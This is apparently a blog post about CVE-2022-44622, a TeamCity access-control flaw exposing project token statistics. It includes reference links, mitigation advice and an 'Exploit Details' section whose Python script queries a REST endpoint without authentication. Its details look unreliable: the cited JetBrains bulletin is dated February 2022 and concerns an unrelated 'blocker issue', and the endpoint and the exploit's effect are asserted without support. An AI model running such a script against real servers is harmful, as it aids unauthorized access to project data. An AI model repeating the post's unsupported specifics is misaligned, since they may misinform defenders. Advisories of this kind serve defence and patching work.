CVE-2022-44622: JetBrains TeamCity Security Vulnerability - Excessive Access Permissions for Secure Token Health Items Exploited

In today's world of ever-evolving technology, it's crucial to stay on top of your software and systems to ensure the highest degree of security. Unfortunately, vulnerabilities often surface, opening the door for hackers to exploit these weak points. One such vulnerability has been discovered in JetBrains TeamCity versions between 2021.2 and 2022.10, where access permissions for secure token health items are excessive. In this post, we'll dive deep into this vulnerability, explore its implications, and learn how to mitigate its risks.

CVE-2022-44622: Vulnerability Overview
The vulnerability, identified as CVE-2022-44622, exists in JetBrains TeamCity, a popular continuous integration and deployment server used by development teams across the globe. It is caused by an oversight in the access control mechanism, which has led to excessive access permissions on secure token health items.

This vulnerability allows unauthorized users to access sensitive project data in TeamCity installations. More specifically, it enables unauthorized users to call REST API methods and access project-level secured token stats like project token usage, token creation, and invalidation without having appropriate permissions.

Original References

The vulnerability was reported to JetBrains by a security researcher, and the issue has been documented on MITRE's official CVE database, available here:

- CVE-2022-44622: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44622
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44622

Follow this link to JetBrains security bulletin for more details

- JetBrains: https://blog.jetbrains.com/teamcity/2022/02/teamcity-2022-1-the-blocker-issue/

Exploit Details

An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected TeamCity server. The following code snippet demonstrates a Python script to exploit this vulnerability:

import requests
import sys

teamcity_url = "http://teamcity.example.com/";
api_endpoint = "app/rest/tokenStats"
project_id = "your_project_id"

url = f"{teamcity_url}{api_endpoint}?locator=project:{project_id}"
headers = {"Accept": "application/json"}

response = requests.get(url, headers=headers)

if response.status_code == 200:
    print(f"Token stats for project {project_id}:")
    print(response.text)
else:
    print(f"Failed to retrieve token stats for project {project_id}")

This script attempts to access the token stats for a specified project without any authentication or proper project permissions.

Mitigation

To mitigate CVE-2022-44622, JetBrains has released a security patch for TeamCity. It is highly recommended to update your TeamCity installation to the latest version, which addresses this issue. You can download the latest version from here:

- JetBrains TeamCity Download: https://www.jetbrains.com/teamcity/download/

Make sure to also configure your TeamCity installation's access control to limit REST API access to authorized users only.

Conclusion

This vulnerability highlights the importance of keeping your software up-to-date and having proper access control mechanisms in place. By ensuring that your TeamCity installation is on the latest version and having proper access control configuration, you can reduce the risk of unauthorized access to your sensitive project data. Stay vigilant and always be on the lookout for any security updates or patches, as cyber threats continue to evolve and adapt to new situations.

Timeline

Published on: 11/03/2022 14:15:00 UTC
Last modified on: 11/04/2022 02:36:00 UTC